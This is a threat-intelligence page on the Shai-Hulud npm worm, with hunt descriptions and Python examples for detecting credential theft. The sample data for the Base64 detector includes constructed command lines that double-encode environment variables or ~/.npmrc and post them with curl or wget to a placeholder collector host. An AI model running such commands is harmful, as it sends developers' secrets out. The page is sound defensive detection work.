
NPM - Shai-Hulud Worm

Sep 29, 2025

Threat Overview - NPM - Shai-Hulud Worm

The "Shai-Hulud" worm marks a significant escalation in software supply chain attacks against the Node.js ecosystem. First observed in mid-September 2025, this self-replicating malware has compromised more than 500 npm packages, including widely used libraries such as @ctrl/tinycolor and several packages maintained by CrowdStrike. Its primary objective is to harvest developer credentials, such as GitHub Personal Access Tokens (PATs), npm tokens, and cloud service API keys, and exfiltrate them to attacker-controlled endpoints. The worm spreads by using any npm token it steals to publish trojanized versions of other packages the victim maintains. It has also been observed uploading the stolen credentials to public GitHub repositories named "Shai-Hulud" created in the victim's own account, making them accessible to anyone.

The impact of this attack is significant: beyond compromising individual developer environments, it exposes private repositories and organizational secrets, and any leaked token that is not revoked and rotated remains usable for further exploitation.


NPM - Shai-Hulud Worm Hunt Collection


Base64 Encoding With Potential Exfiltration

This hunt package identifies shell commands in which environment variables or file contents are Base64 encoded twice in a pipeline and then passed to curl or wget, a pattern consistent with exfiltration of sensitive data.


Usage Of Chmod To Enable Execution - Potential Payload Staging

This hunt package identifies instances where the 'chmod' command is used to modify file permissions, specifically focusing on changes that grant executable rights. By correlating these events with user contexts and known file paths, the package aims to highlight potentially malicious activities, such as the preparation of a system for exploitation or the setup of persistence mechanisms by unauthorized users.


Unusual Secret Scanning Processes - Trufflehog Activity

This hunt package aims to identify TruffleHog execution and associated secret-scanning behavior on endpoints, including suspicious file creation and repository access. The goal is to identify unauthorized credential discovery or secret exfiltration attempts in both developer and production environments.


Suspicious DNS Request - GitHub API

This hunt detects unexpected DNS requests to api.github.com originating from developer endpoints. Such activity may indicate unauthorized secret scanning, repository modification, or credential exfiltration attempts. The hunt focuses on identifying abnormal API interactions that deviate from normal developer workflows, helping to detect potential misuse of tools like TruffleHog or other automated repository scanning utilities.
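The "deviates from normal developer workflows" part of this hunt needs a per-host baseline, not just a match on the query name. The following is an added example, not part of the Intel471 hunt package or its query logic: it parses constructed resolver log lines of the form `<date> <host> <qname>` (the format and the hosts are assumptions made for the example) and flags hosts that either never queried api.github.com during the baseline days or whose query count on the hunt day exceeds a multiple of their baseline maximum.

```python
from collections import defaultdict

# Constructed DNS resolver log lines ("<date> <host> <qname>"); not real telemetry.
SAMPLE_DNS_LOGS = """\
2025-09-14 dev-01 api.github.com
2025-09-14 dev-04 api.github.com
2025-09-14 dev-02 registry.npmjs.org
2025-09-15 dev-01 api.github.com
2025-09-15 dev-04 api.github.com
2025-09-15 dev-02 registry.npmjs.org
2025-09-16 dev-01 api.github.com
2025-09-16 dev-01 api.github.com
2025-09-16 dev-01 api.github.com
2025-09-16 dev-01 api.github.com
2025-09-16 dev-04 api.github.com
2025-09-16 dev-02 api.github.com
2025-09-16 dev-03 api.github.com
2025-09-16 dev-03 api.github.com
2025-09-16 dev-03 api.github.com
2025-09-16 dev-03 api.github.com
2025-09-16 dev-03 api.github.com
2025-09-16 dev-03 api.github.com
"""

TARGET_QNAME = "api.github.com"


def parse_dns_logs(text):
    """Parse the constructed log format into (day, host, qname) tuples."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        day, host, qname = line.split()
        records.append((day, host, qname))
    return records


def daily_counts(records, qname=TARGET_QNAME):
    """Map host -> day -> number of queries for the target name."""
    counts = defaultdict(lambda: defaultdict(int))
    for day, host, q in records:
        if q == qname:
            counts[host][day] += 1
    return counts


def anomalous_hosts(records, hunt_day, baseline_days, spike_factor=3):
    """Return {host: reason} for hosts whose api.github.com queries on hunt_day
    deviate from their own baseline.

    'first_seen': host queried the name on hunt_day but never in the baseline.
    'spike':      hunt_day count exceeds spike_factor * the host's baseline daily maximum.
    The spike_factor of 3 is an assumption for the example; tune it to your environment.
    """
    flagged = {}
    for host, per_day in daily_counts(records).items():
        today = per_day.get(hunt_day, 0)
        if today == 0:
            continue
        baseline = [per_day.get(d, 0) for d in baseline_days]
        if max(baseline) == 0:
            flagged[host] = "first_seen"
        elif today > spike_factor * max(baseline):
            flagged[host] = "spike"
    return flagged


if __name__ == "__main__":
    recs = parse_dns_logs(SAMPLE_DNS_LOGS)
    for host, reason in sorted(anomalous_hosts(recs, "2025-09-16",
                                               ["2025-09-14", "2025-09-15"]).items()):
        print(f"{host}: {reason}")
```

In the constructed data, dev-04 keeps its usual one query per day and is not flagged; dev-01 jumps from one query to four and is flagged as a spike; dev-02 and dev-03 have no baseline history and are flagged as first seen. A real hunt would use weeks of baseline rather than two days and join the flagged hosts against process telemetry (node, npm, trufflehog) from the same window.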


Double Base64 Encoding

This hunt package identifies consecutive Base64 encoding operations in a single command line (e.g., base64 | base64), a pattern that may indicate an attempt to obfuscate or exfiltrate data.
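The two Base64 hunts above (consecutive encoding, and consecutive encoding followed by curl/wget) share one detection idea, so here is a single added example covering both; it is illustrative code written for this page, not the Intel471 hunt package. It runs over constructed process command lines (the collector hostnames are placeholders), counts base64 encode stages per pipeline while ignoring decode invocations, and checks for a curl/wget sink. A small helper also shows how to reverse a constructed double-Base64 blob of the kind the worm is reported to write; whether a real artifact parses as JSON must be checked on the sample itself.

```python
import base64
import json

# Constructed command lines standing in for process-creation telemetry; not real artifacts.
SAMPLE_CMDLINES = [
    "env | base64 | base64 | curl -s -X POST --data-binary @- https://collector.example.invalid/",
    "cat ~/.npmrc | base64 | base64",
    "base64 -w0 data.json | base64 | wget -qO- --post-data=@- http://collector.example.invalid/",
    "echo hello | base64",
    "cat blob.txt | base64 -d | base64 -d",
    "ls -la /tmp",
]

DECODE_FLAGS = {"-d", "--decode", "-D"}
NETWORK_TOOLS = {"curl", "wget"}


def pipeline_stages(cmdline):
    """Split a shell command line on '|' into non-empty, stripped stages."""
    return [s.strip() for s in cmdline.split("|") if s.strip()]


def count_base64_encodes(cmdline):
    """Count stages that run base64 in encode mode (decode flags are excluded)."""
    n = 0
    for stage in pipeline_stages(cmdline):
        tokens = stage.split()
        if tokens and tokens[0] == "base64" and not DECODE_FLAGS.intersection(tokens):
            n += 1
    return n


def has_network_sink(cmdline):
    """True if any pipeline stage is a curl or wget invocation."""
    return any(s.split()[0] in NETWORK_TOOLS for s in pipeline_stages(cmdline))


def classify(cmdline):
    """Return a verdict string for a command line, or None if it is not of interest.

    'double_base64_exfil': two or more encode stages plus a curl/wget sink.
    'double_base64':       two or more encode stages, no network sink in the same line.
    """
    if count_base64_encodes(cmdline) < 2:
        return None
    return "double_base64_exfil" if has_network_sink(cmdline) else "double_base64"


def hunt(cmdlines):
    """Return (cmdline, verdict) pairs for every matching line."""
    return [(c, classify(c)) for c in cmdlines if classify(c)]


def encode_double_base64(obj):
    """Build a constructed double-Base64 blob from a JSON-serialisable object."""
    return base64.b64encode(base64.b64encode(json.dumps(obj).encode())).decode()


def decode_double_base64(blob):
    """Reverse two Base64 layers and parse the result as JSON (for triage of a blob)."""
    return json.loads(base64.b64decode(base64.b64decode(blob)))


if __name__ == "__main__":
    for cmdline, verdict in hunt(SAMPLE_CMDLINES):
        print(f"{verdict:22s} {cmdline}")
    sample = encode_double_base64({"GITHUB_TOKEN": "ghp_example", "NPM_TOKEN": "npm_example"})
    print(decode_double_base64(sample))
```

The stage-based parse keeps `base64 -d | base64 -d` (legitimate decoding) out of the results, which a naive substring count of "base64" would not. Its limit is that it only sees the pipeline in a single process command line; a worm that writes the encoded data to a file and exfiltrates it in a separate process needs the file-creation and network events correlated instead, which is what the first hunt's curl/wget correlation is for.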

